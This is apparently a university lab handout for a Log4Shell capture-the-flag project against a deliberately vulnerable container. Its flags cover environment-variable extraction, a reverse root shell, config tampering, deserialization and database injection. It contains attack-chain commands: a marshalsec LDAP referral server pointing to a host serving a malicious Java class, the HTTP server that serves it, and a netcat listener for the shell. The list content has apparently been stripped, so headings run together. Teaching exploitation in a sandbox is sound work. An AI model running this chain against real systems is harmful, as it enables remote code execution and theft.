[org.springframework.web.HttpMediaTypeNotAcceptableException: Could not parse ‘Accept’ header [Java version 1.8.0_20]: Invalid mime type “Java version 1.8.0_20”: does not contain ‘/’] SetupThis setup process requires 4 separate terminal windows running simultaneously. Complete each step in order and keep all terminals active throughout the lab.Step 1: User Authentication and Container StartYou will need to switch users to log in to log4j user via:Credentials can be found in Canvas on the Log4Shell Assignment pageFrom the log4j user’s home directory, start the container:./StartContainer.shSuccess Indicator: Container starts without errors and returns to command prompt.Step 2: Log Monitoring SetupOpen Terminal Window #2 and navigate to the logs directory:cd Desktop/log4shell/logsMonitor application activity using one of these commands:For application logs:tail -f cs6035.logFor console debug output:tail -f console.logSuccess Indicator: You should see log output similar to the image below.**Log Rollover Issue: If logs stop updating, restart the tail command. This happens when log files become too large and rotate to new files.**Step 3: LDAP Reference Server:Open Terminal Window #3 and navigate to the target directory:cd ~/Desktop/log4shell/targetStart the LDAP server:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://172.17.0.1:4242/#Exploit”Critical Configuration Notes:It is very important that this matches the port specified in the Malicious server. If your exploit is not working because it is not connecting to the malicious server, your ports likely do not match OR the vm’s IP is not correct.Success Indicator: Output shows server listening on 0.0.0.0:1389Step 4: Malicious Payload ServerOpen Terminal Window #4 and navigate to your flag-specific directory:python3 -m http.server 4242Your malicious .class file must be served from the directory your server is running in.Port Synchronization: This port (4242) must match the port specified in the LDAP server URL from Step 3.Success Indicator: Server confirms it’s serving HTTP on port 4242.Step 5: Network Traffic Monitoring (Flag 2 Required, Others Optional)Open Terminal Window #5 (if needed) and start a network listener:nc -nlvp Success Indicator: Output shows listener ready on your specified port.Development and DebuggingAdding Debug Output to Your ExploitTo monitor debug statements from your Java exploit code:Setup Verification ChecklistBefore proceeding with exploitation, verify all components are running:Common TroubleshootingConnection Issues Between ServersProblem: Exploit not connecting to malicious serverSolutions:Log Monitoring IssuesProblem: Logs stop updatingSolutions:Server Startup FailuresProblem: LDAP or HTTP server won’t startSolutions:Ready to ProceedOnce all servers are running and verified, you’re ready to begin the exploitation phases. Keep all terminal windows open and active throughout the lab. Introduction FlagOverviewThis introductory exercise will help you understand Log4j fundamentals and verify your exploit environment is working correctly. You’ll learn to identify vulnerable logging patterns and execute your first successful Log4Shell exploit.Understanding Log4j LoggingBasic Log4j StructureLog4j is a logging framework that outputs program information defined by developers. A typical log statement follows this pattern:static Logger log = LogManager.getLogger(RestServlet.class.getName());log.debug(“ApplicationId: {}”, applicationId);Key Components:Log Output AnalysisThe code above produces output like this:Output Breakdown:Log Levels ExplainedLog levels control output verbosity:Current Configuration: This application is set to DEBUG level, showing all message types.Vulnerability IdentificationThe Attack VectorThe vulnerability exists wherever user-controlled input is logged without sanitization. In our example:log.debug(“ApplicationId: {}”, applicationId);The applicationId variable can contain malicious Log4j lookup expressions that will be processed and executed.Initial Application TestingEnvironment VerificationBefore attempting exploits, verify the application responds correctly to normal requests.Required Header: All requests must include the GATECH_ID header.Basic Connectivity TestOpen a new terminal and execute:curl ‘http://localhost:8080/rest/wizards/isAlive’ -H ‘GATECH_ID:123456789’ -H ‘Accept:application/json’Analyzing the ResponseSwitch to your log monitoring terminal to examine the output. Look for:Expected Output:Note: You can zoom in by using ctrl + scrollIdentifying Exploit OpportunitiesFrom the log output, you should see the application logging:First Exploit: Java Version LookupTarget HeadersThe application checks and logs these headers (not all may be exploitable):Constructing the PayloadYour goal is to create a Log4j lookup expression that retrieves the Java version from the server.Executing the ExploitCraft a curl command that includes your malicious payload in one of the target headers. The payload should use Log4j’s lookup syntax to extract system information.Success VerificationIf successful, you should see output similar to:Success Indicator: Look for Java version information in the logs. You may need to scroll up to find the output.Expected Result: The logs should display detailed Java runtime information, confirming successful exploitation.Understanding Your SuccessWhat Just Happened?Security ImplicationsThis demonstrates how Log4Shell can be used for:Next Steps and ExplorationAdditional Lookups to TryExperiment with other Log4j lookup expressions:Important RemindersSave Your Work: Regularly save your progress outside the VM to prevent data loss from system crashes or unexpected issues.TroubleshootingNo Log Output VisibleExploit Not WorkingSuccess ConfirmationYou’ve successfully completed this section when:FLAG 1: Environment Echo (5 pts)OverviewThis exercise builds upon your Log4Shell foundation by targeting environment variables. You’ll use Log4j lookup expressions to extract sensitive configuration data stored in the server’s environment, specifically the ADMIN_PASSWORD variable containing your flag.PrerequisitesRequired CompletionBefore attempting this flag, ensure you have successfully completed:Verification StepsConfirm your environment is ready by checking:Environment SetupContainer InitializationIf not already running, start the vulnerable application:./StartContainer.shImportant: Execute this script from the home directory of the log4j user to ensure proper path resolution.Connectivity VerificationTest the target endpoint to confirm it’s accessible:curl ‘http://localhost:8080/rest/wizards/isAlive’ -H ‘GATECH_ID:123456789’ -H ‘Accept:application/json’Expected Behavior:Understanding Environment VariablesWhat Are Environment Variables?Environment variables are key-value pairs that store configuration data outside the application code. They commonly contain:The ChallengeYour objective is to extract the ADMIN_PASSWORD environment variable, which contains the flag for this exercise.Attack Vector SelectionFrom your intro flag experience, you know that HTTP headers are logged and processed. You’ll need to:Success VerificationWhen successful, you should see log output similar to:Flag FormatLook for the specific message pattern: “Congratulations! Your flag1 is: __________“Submission RequirementsFlag RecordingOnce you’ve successfully extracted the flag:Important RemindersSimplicity Focus: You do not need Java code, LDAP servers, Python scripts, or other complex tools for this flag. The solution uses only curl and Log4j lookup expressions.Header Experimentation: If your first attempt doesn’t work, try different headers.Case Sensitivity: Environment variable names are typically case-sensitive. Ensure you’re using the exact variable name: ADMIN_PASSWORDTroubleshootingNo Flag VisibleExploit Not Working FLAG 2: Get a Shell (5 pts)OverviewThis exercise demonstrates the most dangerous aspect of Log4Shell: remote code execution (RCE). You’ll craft a malicious Java payload that exploits JNDI/LDAP lookups to gain root shell access on the vulnerable server. This represents a critical security breach that could compromise an entire system.PrerequisitesRequired CompletionBefore attempting this flag, ensure you have successfully completed:Essential ReadingCritical: You MUST read through the suggested readings about JNDI lookups before proceeding. Understanding the underlying mechanism is essential for crafting effective payloads.Knowledge RequirementsThis exercise assumes you understand:Understanding the Exploit ChainThe Attack FlowLog4Shell RCE follows this sequence:Why This WorksThe vulnerability exists because:Environment SetupContainer InitializationEnsure the vulnerable application is running:./StartContainer.shConnectivity VerificationTest the target endpoint:curl ‘http://localhost:8080/rest/wizards/isAlive’ -H ‘GATECH_ID:123456789’ -H ‘Accept:application/json’Multi-Terminal SetupYou should have 5 terminal windows open:Java Version VerificationCritical Version RequirementThis exploit requires Java version 1.8.0_20 specifically. Other versions have security patches that prevent JNDI lookups.Version CheckVerify your Java version before proceeding:java -versionExpected Output:Version ImportanceWhy This Matters:Critical Warning: Using the wrong Java version will waste significant time as your exploit will fail silently. Always verify the version first.Payload DevelopmentExploit.java AnalysisNavigate to your Exploit.java file and examine its structure. This file will contain the malicious code that executes when the JNDI lookup occurs.Payload ObjectivesYour Exploit.java should:Debugging CapabilitiesThe environment includes logging support for development.Log File Location: ~/Desktop/log4shell/logs/console.logDebugging Method:System.out.println(“Debug message here”);Monitor your debug output:tail -f ~/Desktop/log4shell/logs/console.logCompilation ProcessWorking DirectoryNavigate to the correct directory:cd Desktop/log4shell/FlagxImportant: Ensure you’re in the correct directory before compilationJava CompilationCompile your exploit code:javac Exploit.javaExpected Result:Success Indicator: This creates Exploit.class in the same directoryCompilation TroubleshootingIf compilation fails:Service CoordinationHTTP Server SetupFrom the directory containing Exploit.class, start your HTTP server:python3 -m http.server 4242Purpose: This serves your malicious Java class to the vulnerable serverPort ManagementCritical: Pay close attention to port numbers throughout this exercise. Mismatched ports are a common failure point.Port Usage:Service VerificationEnsure all services are running:Exploit ExecutionPayload ConstructionCraft a JNDI lookup payload in your attack vector that:Monitoring SuccessWatch for activity across all terminals:Success VerificationExpected Console OutputWhen successful, you should see output similar to:Python server output:LDAP server output:NC output:Shell Access ConfirmationIn your netcat terminal, you should receive a shell connection. Test with:whoamiExpected Response: rootRoot Access AchievedIf you see “root” in response to whoami, congratulations! You have successfully:Flag RetrievalNavigationFrom your root shell, navigate to the flag location:cd ../..Flag ExecutionRun the flag retrieval program:java -jar Flag2.jarExpected Output:Flag SubmissionAdd the retrieved flag to your project_log4shell.json file under the “Flag2” field.Security ImplicationsThis exploit shows how Log4Shell can lead to:Real-World ImpactIn production environments, this level of access could enable:TroubleshootingCommon IssuesNo LDAP/HTTP Server ActivitySymptoms: No requests reaching your serversSolutions:Compilation FailuresSymptoms: javac command fails or produces errorsSolutions:Shell Connection IssuesSymptoms: No reverse shell connection receivedSolutions:Service Coordination ProblemsSymptoms: Partial success but missing componentsSolutions:Debugging StrategyImportant RemindersJava Version Critical: Always verify Java 1.8.0_20 before starting. Wrong versions cause silent failures.Port Coordination: Mismatched ports are the most common failure point. Double-check all port configurations.Debug Logging: Use System.out.println statements liberally to trace execution flow.Multi-Terminal: Keep all four terminals visible to monitor the complete attack chain. FLAG 3: Config.Properties Surprise (25 pts)OverviewThis exercise demonstrates Log4Shell’s ability to manipulate application configuration files in real-time. You’ll exploit the vulnerability to modify a properties file that controls wizard magic powers, showcasing how attackers can alter application behavior through configuration tampering. This represents an attack that combines file manipulation with application logic exploitation.PrerequisitesRequired CompletionBefore attempting this flag, ensure you have successfully completed:Advanced Concepts RequiredThis exercise assumes familiarity with:Environment SetupContainer InitializationEnsure the vulnerable application is running:./StartContainer.shAPI EndpointsThe /wizards/ resource provides these relevant endpoints:GET All Records:curl ‘http://localhost:8080/rest/wizards/wizardList’ -H ‘GATECH_ID:123456789’GET By ID:curl ‘http://localhost:8080/rest/wizards/wizard/’ -H ‘GATECH_ID:123456789’Configuration ArchitectureThe application uses a config.properties file stored in the root directory that:Initial ReconnaissancePerform preliminary reconnaissance to understand the application behavior:Reconnaissance PhaseData Structure AnalysisExecute the list command to examine available wizard records:curl ‘http://localhost:8080/rest/wizards/wizardList’ -H ‘GATECH_ID:123456789’Analysis Objectives:Individual Record InspectionSelect a wizard ID from the list and examine its detailed response:curl ‘http://localhost:8080/rest/wizards/wizard/’ -H ‘GATECH_ID:123456789’Key Observations:Attack Vector IdentificationCritical: Look for unusual or “out of place” variables in the logged output that might serve as attack vectors. These could include:Understanding the Configuration SystemProperties File StructureThe config.properties file contains key-value pairs that control application behavior:Tamper Detection MechanismThe application includes security measures:Attack ObjectiveYour goal is to modify the properties file so that:Security Filter AnalysisSomeone might have tried to roll their own patch and tried to deny requests containing malicious string patterns.This suggests:Filter Bypass StrategiesConsider these approaches:Payload DevelopmentPayload Construction ConsiderationsYour payload must:Injection Point SelectionBased on your reconnaissance, identify where user input is logged and processed. This could be:Testing StrategySuccess VerificationExpected Response BehaviorWhen successful, wizard API responses should show:Flag RetrievalIf successful, you should receive your flag in the house field of the response:Response AnalysisImportant: Error messages in the logs are informational and don’t necessarily indicate exploit failure. Focus on:TroubleshootingCommon IssuesBlank Flag ResponseSymptoms: Flag field appears empty or missingSolution: Restart the container environment:./stopContainer.sh./startContainer.shFilter Bypass FailuresSymptoms: Payload appears blocked or filteredSolutions:Configuration Not PersistingSymptoms: Properties revert to original valuesSolutions:Injection Point IdentificationSymptoms: Unable to locate the attack vectorSolutions:Debugging MethodologySecurity ImplicationsConfiguration Tampering ImpactThis exploit demonstrates:Real-World ConsequencesIn production environments, configuration tampering could enable:Important RemindersReconnaissance Critical: Careful analysis of logged output is essential to identify the attack vector.Filter Awareness: Basic string filtering may be in place – prepare bypass techniques.File Integrity: Maintain all existing properties to avoid tamper detection.Container Reset: If flag appears blank, restart the container environment.GATECH ID Target: Use your GATECH ID as the magicPower value. FLAG 4: Command and Concat (25 pts)OverviewThis exercise demonstrates Log4Shell’s capability for Java deserialization attacks combined with out-of-the-box obfuscation techniques. You’ll exploit a p2p payment endpoint to achieve file creation on the server through malicious object deserialization. The flag name “Command and Concat” provides critical hints about the exploitation technique involving command execution and string concatenation methods.PrerequisitesRequired CompletionBefore attempting this flag, ensure you have successfully completed:Advanced Concepts RequiredThis exercise requires deep understanding of:Understanding Deserialization AttacksWhat is Java Deserialization?Java deserialization converts byte streams back into Java objects. When untrusted data is deserialized, it can lead to:Log4Shell + DeserializationThis attack combines:The Attack ChainThe complete exploit flow involves:Environment SetupContainer InitializationEnsure the vulnerable application is running:./StartContainer.shTarget Analysis: Payment EndpointAPI Endpoint StructureThe vulnerable endpoint accepts payment creation requests:curl -X POST ‘http://localhost:8080/rest/payments/payment’ -H ‘GATECH_ID:123456789’ -H ‘Content-Type:application/json’ –data-raw ‘{“paymentId”:”1″,“amount”:”100″,“payer”: {“id”:”2″,“firstName”:”test”,“lastName”:”test”,“accountNumber”:”321″},“payee”: {“id”:”1″,“firstName”:”test”,“lastName”:”test”,“accountNumber”:”123″},“paymentDateTime”: “2025-03-06T06:00:00.923163”}‘Request AnalysisKey Components:Initial ReconnaissanceExecute the provided curl command to understand baseline behavior:curl -X POST ‘http://localhost:8080/rest/payments/payment’ -H ‘GATECH_ID:123456789’ -H ‘Content-Type:application/json’ –data-raw ‘{“paymentId”:”1″,“amount”:”100″,“payer”: {“id”:”2″,“firstName”:”test”,“lastName”:”test”,“accountNumber”:”321″},“payee”: {“id”:”1″,“firstName”:”test”,“lastName”:”test”,“accountNumber”:”123″},“paymentDateTime”: “2025-03-06T06:00:00.923163”}‘Analysis Objectives:Log Message Format AnalysisCritical: Pay close attention to logged message formats. The hint emphasizes that message formatting is key to exploitation.Look for:Payload Development StrategyFile Creation ObjectiveYour Exploit.java must create a file with these exact specifications:Execution and MonitoringExecute your payload while monitoring:Success VerificationExpected Log OutputUpon successful exploitation, you should see output similar to:Success Indicators:File VerificationThe exploit should create:Flag ExtractionThe flag appears in the log output after successful file creation. Look for flag information in the logged messages following the postPayment method execution.TroubleshootingCommon IssuesNo File CreationSymptoms: Exploit executes but file isn’t createdSolutions:Deserialization FailuresSymptoms: JNDI lookup succeeds but no executionSolutions:Injection Point IssuesSymptoms: Payload doesn’t trigger JNDI lookupSolutions:Blank Flag ResponseSymptoms: Flag field appears emptySolution: Restart the container environment:./stopContainer.sh./startContainer.shDebugging StrategySecurity ImplicationsDeserialization Attack ImpactThis exploit demonstrates:Real-World ConsequencesIn production environments, deserialization attacks enable:Important RemindersExact Specifications: File must be named Ronnie.txt with content TimeToBleed! exactly.Hint Utilization: “Command and Concat” directly indicates the exploitation technique.Log Analysis: Careful examination of log message formats is crucial for finding injection points.Container Reset: If flag appears blank, restart the container environment.FLAG 5: PubSub Override (25 pts)OverviewThis exercise demonstrates Log4Shell’s capability to manipulate application messaging systems through configuration file exploitation. You’ll exploit the vulnerability to redirect publish-subscribe communications to alternative topics, showcasing how attackers can intercept and manipulate real-time messaging infrastructure. This represents an attack that combines configuration tampering with message routing manipulation.PrerequisitesRequired CompletionBefore attempting this flag, ensure you have successfully completed:Advanced Concepts RequiredThis exercise assumes familiarity with:Environment SetupContainer InitializationEnsure the vulnerable application is running:./StartContainer.shTarget EndpointThe user update endpoint that triggers the messaging system:PUT User Update:curl -X PUT ‘http://localhost:8080/rest/users/user’ -H ‘GATECH_ID:123456789’ -H ‘Content-Type:application/json’ –data-raw ‘{“id”:8,”userId”:”2134″,”userName”:”RSANCHEZ1″,”userRole”:”R&D”,”adminYN”:”Y”}’Configuration ArchitectureThe application uses a config.properties file that:Understanding the Messaging SystemPubSub ArchitectureThe application implements a publish-subscribe pattern where:Configuration IntegrationThe config.properties file contains:Attack ObjectiveYour goal is to:Reconnaissance PhaseLog Analysis PreparationCritical Hint: Look through the cs6035.log to find clues about what this other topic could be.Execute the user update command while monitoring logs:curl -X PUT ‘http://localhost:8080/rest/users/user’ -H ‘GATECH_ID:123456789’ -H ‘Content-Type:application/json’ –data-raw ‘{“id”:8,”userId”:”2134″,”userName”:”RSANCHEZ1″,”userRole”:”R&D”,”adminYN”:”Y”}’Log Output AnalysisAnalysis Objectives:Message Flow InvestigationMonitor the application logs for:Configuration Manipulation StrategyBased on previous properties file exploitation knowledge:Payload Development StrategyFile Creation ObjectiveYour exploit must:Execution and MonitoringTesting MethodologySuccess VerificationExpected Log OutputUpon successful exploitation, you should see output similar to:Verification StepsSuccess IndicatorsTroubleshootingCommon IssuesBlank Flag ResponseSymptoms: Flag field appears empty or missingSolution: Restart the container environment:./stopContainer.sh./startContainer.shTopic Discovery DifficultiesSymptoms: Unable to identify alternative topics in logsSolutions:Properties File CorruptionSymptoms: Application errors after exploitation attemptSolutions:Message Publishing FailuresSymptoms: No messages appear in logs after user updateSolutions:Debugging MethodologySecurity ImplicationsMessage Routing ManipulationThis exploit demonstrates:Real-World ConsequencesIn production environments, PubSub manipulation could enable:Enterprise Messaging SecurityConsider the broader implications:Important RemindersLog Analysis Critical: Careful examination of cs6035.log is essential to discover alternative topics.GATECH_ID Requirement: Ensure your GATECH_ID is appropriately included in the published message account number field for valid flag generation.Container Reset: If flag appears blank, restart the container environment using the provided scripts.Properties Integrity: Maintain existing properties structure to avoid application errors.Message Monitoring: Watch the complete message publishing sequence to verify successful exploitation. FLAG 6: Restful Data (15 pts)OverviewThis exercise demonstrates Log4Shell’s capability to exploit data persistence layers through malicious record injection. Unlike previous flags that focused on real-time request processing (“data in transit”), this challenge explores “data at rest” exploitation where malicious payloads are stored in databases and triggered during subsequent data retrieval operations. This represents a persistence attack that combines database manipulation with delayed payload execution.PrerequisitesRequired CompletionBefore attempting this flag, ensure you have successfully completed:Advanced Concepts RequiredThis exercise assumes familiarity with:Environment SetupContainer InitializationEnsure the vulnerable application is running:./StartContainer.shWizards API EndpointsThe /wizards/ resource provides comprehensive CRUD operations:GET All Records:curl ‘http://localhost:8080/rest/wizards/wizardList’ -H ‘GATECH_ID:123456789’GET By ID:curl ‘http://localhost:8080/rest/wizards/wizard/’ -H ‘GATECH_ID:123456789’GET By House:curl ‘http://localhost:8080/rest/wizards/wizard?house=exampleHouse’ -H ‘GATECH_ID:123456789’POST Create/Update:curl -X POST ‘http://localhost:8080/rest/wizards/wizard’ -H ‘GATECH_ID:123456789’ -H ‘Content-Type: application/json’ -d ‘{“name”: “wizard”,“wand”: “occulus”,“magicPower”: “skill”,“powerLevel”: 1,“house”: “maxwell”}’Database ArchitectureThe application uses an in-memory database that:Understanding Data at Rest ExploitationAttack Vector DistinctionData at Rest vs. Data in Transit:Database Persistence StrategyThe exploitation process involves:Target ConfigurationSimilar to previous flags, you must:Reconnaissance PhaseInitial Data Structure AnalysisExamine the existing wizard structure:curl ‘http://localhost:8080/rest/wizards/wizardList’ -H ‘GATECH_ID:123456789’Analysis Objectives:Endpoint Behavior InvestigationTest each endpoint while monitoring logs to understand:Log Output Pattern AnalysisCritical: You will need to inspect logs for each of the endpoints to come up with a successful attack strategy.Monitor application logs during:Attack Vector DevelopmentMalicious Record DesignYour malicious wizard record must:Field Selection StrategyConsider which wizard fields are most likely to:Payload Construction ConsiderationsHint: The obfuscation technique in this flag will be different than previous ones. Try out the KISS approach on this.Payload Development GuidelinesSimple Payload ConstructionFollowing the KISS principle, start with basic Log4j syntax:Database Persistence VerificationEnsure your malicious record:Success VerificationExpected Log OutputUpon successful exploitation, you should see output similar to:Verification SequenceSuccess IndicatorsTroubleshootingCommon IssuesBlank Flag ResponseSymptoms: Flag field appears empty or missingSolution: Restart the container environment:./stopContainer.sh./startContainer.shNote: This will delete all persisted records due to in-memory databasePayload Not TriggeringSymptoms: Malicious record created but no LDAP callback occursSolutions:Record Persistence FailuresSymptoms: Malicious record not successfully storedSolutions:Configuration Update FailuresSymptoms: LDAP callback occurs but config.properties not updatedSolutions:Debugging MethodologySecurity ImplicationsData Persistence Attack VectorsThis exploit demonstrates:Real-World ConsequencesIn production environments, data at rest exploitation could enable:Database Security ImplicationsConsider the broader impact on:Important RemindersData at Rest Requirement: This flag specifically requires a data at rest approach – data in transit methods will not work.KISS Principle: Use simple, straightforward payload construction rather than complex obfuscation techniques.Database Reset: Container restart will delete all records due to in-memory database architecture.Log Inspection Critical: Carefully analyze logs from each endpoint to identify successful trigger points.Wizard ID Tracking: Note the assigned wizard ID for proper config.properties update. FLAG 7 (Extra Credit): SQL Attack Authorization Persuasion (2 Pts)OverviewThis extra credit exercise represents a unique database exploit through log4shell. Unlike traditional SQL injection attacks that exploit application queries, this challenge requires using Log4Shell to execute arbitrary code that directly manipulates the database at the system level. You’ll demonstrate persistence techniques by injecting a malicious user record that bypasses application authorization controls, showcasing how Log4Shell can be weaponized for privilege escalation and access control circumvention.PrerequisitesRequired CompletionBefore attempting this flag, ensure you have successfully completed:Advanced Concepts RequiredThis exercise assumes mastery of:Environment SetupContainer InitializationEnsure the vulnerable application is running:./StartContainer.shTarget Endpoint AnalysisThe user deletion endpoint that enforces admin authorization:DELETE User by ID:curl -X “DELETE” ‘http://localhost:8080/rest/users/user/’ -H “GATECH_ID:123” -H “X-NetworkUserId:MWAD10”Authorization ArchitectureThe application implements strict access controls where:User List InspectionExamine existing users for authorization testing:curl ‘http://localhost:8080/rest/users/all’ -H ‘GATECH_ID:123456789’Understanding the Attack ChallengeNon-Traditional SQL AttackCritical Distinction: This is NOT a typical SQL injection attackLog4Shell Execution ContextKey Constraint: Log4shell does not allow you to interact with the program’s state itself, only execute arbitrary code at the level of access the vulnerable program itself is running on.This means:Attack Objective RequirementsYou must create a user with specific attributes:Reconnaissance PhaseDatabase Information GatheringCritical Hint: Look in the logs for information on the database, the schema, and what could be useful for this attack.Analyze application logs for:Log File Analysis StrategySystematic Log Examination Required:Schema Discovery ObjectivesLook for information about:Attack Vector DevelopmentMulti-Stage Attack StrategyHint 2: You will need to leverage one of the previous flags’ curls to get the keys to unlock this flag.Java Standard Library ExploitationConstraint: You will not need anything outside the java standard library for this attack.Focus on Java built-in capabilities:Direct Database Manipulation StrategySince traditional SQL injection won’t work:Technical Implementation ConsiderationsDatabase Connection StrategiesDepending on discovered database type:User Record ConstructionEnsure proper record format:Success VerificationExpected Log OutputUpon successful exploitation, you should see output similar to:Verification SequenceSuccess IndicatorsTroubleshootingCommon IssuesDatabase Access FailuresSymptoms: Unable to establish database connection or accessSolutions:User Insertion FailuresSymptoms: EDBOY user not created or missing required attributesSolutions:Authorization Still FailingSymptoms: DELETE operation still denied despite EDBOY creationSolutions:Flag Generation IssuesSymptoms: Authorization succeeds but no flag appearsSolutions:Debugging MethodologySecurity ImplicationsAdvanced Persistence TechniquesThis exploit demonstrates:Real-World ConsequencesIn production environments, this attack could enable:Enterprise Security ImplicationsConsider the broader impact on:Important RemindersLog Analysis Critical: Thorough examination of both log files is essential to discover database configuration and schema information.Java Standard Library Only: Use only built-in Java capabilities for database manipulation – no external libraries required.Previous Flag Integration: Leverage techniques from previous flags as delivery mechanisms for this advanced payload.Exact User Attributes: EDBOY user must have precise userName, userRole, and adminYN values as specified.GATECH_ID Requirement: Ensure your GATECH_ID is appropriately included for valid flag generation.System-Level Thinking: This requires direct database manipulation, not traditional application-level SQL injection. FLAG 8 (Extra Credit): Pen Testing Challenge (2 pts)OverviewThis extra credit exercise represents the ultimate Log4Shell penetration testing challenge. Unlike previous flags that provided specific attack vectors and detailed guidance, this challenge simulates real-world penetration testing where attackers must discover vulnerabilities through systematic reconnaissance and creative exploitation. You’ll demonstrate mastery of all previous techniques while developing the critical thinking and methodical approach essential for professional security assessment.PrerequisitesRequired CompletionBefore attempting this flag, ensure you have successfully completed:Advanced Concepts RequiredThis exercise assumes complete mastery of:Environment SetupContainer InitializationEnsure the vulnerable application is running:./StartContainer.shAvailable Attack SurfacesYou have access to all previously explored endpoints and techniques:Endpoint Selection FreedomCritical Note: You can choose to use whichever one you prefer.This means:Understanding the Pen Testing ChallengeReal-World SimulationThis challenge simulates authentic penetration testing where:Discovery-Based MethodologyKey Challenge: The attack vector will not be given and you might even need to use a couple steps to reveal the attack vector.This requires:Information Gathering PriorityCritical Requirement: Pay very close attention to every log message, hint, error, etc as it will be vital to figuring out the sequence of events.Focus on:Reconnaissance MethodologySystematic Endpoint AnalysisSince no specific attack vector is provided, systematically analyze all available endpointsLog Analysis StrategyComprehensive Log Monitoring Required:Hidden Functionality DiscoveryLook for indicators of:Professional Pen Testing ApproachSystematic Testing MethodologyDocumentation and TrackingMaintain detailed records of:Persistent InvestigationWhen initial attempts fail:Success VerificationSuccess IndicatorsVerification ProcessSubmissionFor this flag, you will need to append your “key” to the generated flag hash in the following format.“flag8”: “fullKey:a703a52cb1c6d955c1e521fbd8c9c0af393ef94aa2a922a680c8a12ab16daa4d”TroubleshootingCommon ChallengesAttack Vector Not ObviousSymptoms: Unable to identify clear exploitation opportunitiesSolutions:Multi-Stage Attack ConfusionSymptoms: Partial success but unable to complete exploitationSolutions:Log Analysis OverwhelmSymptoms: Too much information to process effectivelySolutions:Flag Generation FailuresSymptoms: Exploitation attempts don’t generate expected flagSolutions:Debugging MethodologySecurity ImplicationsWhat You’ve DemonstratedProfessional Penetration Testing SkillsThis challenge demonstrates:Real-World Penetration TestingThe skills developed here directly apply to:Advanced Attack SophisticationConsider the implications of:Important RemindersNo Guidance Provided: This challenge intentionally provides no specific attack vector – discovery is part of the exercise.Multi-Stage Possibility: Be prepared for attacks requiring multiple steps or techniques in sequence.Every Detail Matters: Pay close attention to all log messages, errors, and subtle behavioral changes.Systematic Approach: Use professional penetration testing methodology for comprehensive coverage.GATECH_ID Integration: Ensure your GATECH_ID is properly included in the final exploitation chain.Documentation Critical: Maintain detailed records of your discovery and exploitation process.Persistence Required: Real penetration testing requires methodical investigation and creative thinking. Project Submission InstructionsSubmission PlatformThis project must be submitted through Gradescope for automated grading.Access Gradescope:Grading InformationImportant: Always verify your intended submission is marked as “active” before the deadline.File PreparationRequired File FormatCreate a file named project_log4shell.json containing your collected flags in proper JSON format.Template LocationA pre-formatted template is available at:~/Desktop/log4shell/project_log4shell.jsonRecommended Text EditorsUse only plain text editors:Critical: Do NOT use LibreOffice, Microsoft Word, or any rich text editors. These applications introduce special characters that will cause the autograder to fail.JSON File StructureTemplate Format{“flag1”: “”,“flag2”: “”,“flag3”: “”,“flag4”: “”,“flag5”: “”,“flag6”: “”,“flag7”: “”}Completed Example{“flag1”: “4ec60c3e084d8387f0f33916e9b08b99d5264a486c29130dd4a5a530b958c5c0f1faeaca2ce30b478281ec546a4729f629b531a86cb27d86c089f0c542”,“flag2”: “f496d9514c01e8019cd2bc21edfeb8e33f4a29af14a8bf92f7b3c14b5e06c5c0f1faeaca2ce30b478281ec546a4729f629b531a86cb27d86c089f0c442”,“flag3”: “b621bba0bb535f2f7a222bd32994d3875bcfcad651160c543de0a01dbe2e0c5c0f1faeaca2ce30b478281ec546a4729f629b531a86cb27d86cf0c49542”,“flag4”: “b34235hjghg34g23g4uy23g4yg12h1j2g4f12hj4gj1h2g4g12h4g12h4ghj12g4jh1g24khj1g24jhg1k4gh1h24g1j24h1g24hjg124hg12k4hg1hj4gj1h2”,“flag5”: “6kj2348932ur98wef89yawfsf89asdyf87adtsguihasidogy87dsghiausdyg87adshgo87dshg9ueg90ojawoeigj9we8ye8t9yqwethijkfdjfa98y89eje”,“flag6”: “5g87a8d9sg7a0sd98g79asd87g890as7dg8sadg7ads908gydsiayhgkjtj4tk535j3lk4523j23j4c698ddd5f6a5df67b6xc6vzx786vzx5cv87v8z69xv76”,“flag7”: “afasdfasfafjealjfeioajfoje8auf98yu943h894yt0894h089tyu89igjnafjaffjafjafasdfua-9eufaiejfiajdskfljaslkdfj;aljsdfl;kajdfkl;a”}Pre-Submission ValidationJSON Format VerificationBefore submitting, verify your JSON file is properly formatted:Quick Validation CommandTest your JSON syntax using:python3 -m json.tool project_log4shell.jsonSuccess: File contents display correctlyError: Fix syntax issues before submittingSubmission WorkflowStep-by-Step ProcessSubmission ConfirmationAfter uploading, confirm:Troubleshooting Common IssuesJSON Format ErrorsProblem: Autograder reports JSON parsing errorsSolutions:Missing FlagsProblem: Autograder shows 0 points for some flagsSolutions:File Upload IssuesProblem: Cannot upload file to GradescopeSolutions:Final Submission ChecklistBefore the deadline, verify:Deadline: Check Canvas for specific due date and timeLate Policy: Refer to course syllabus for late submission guidelines
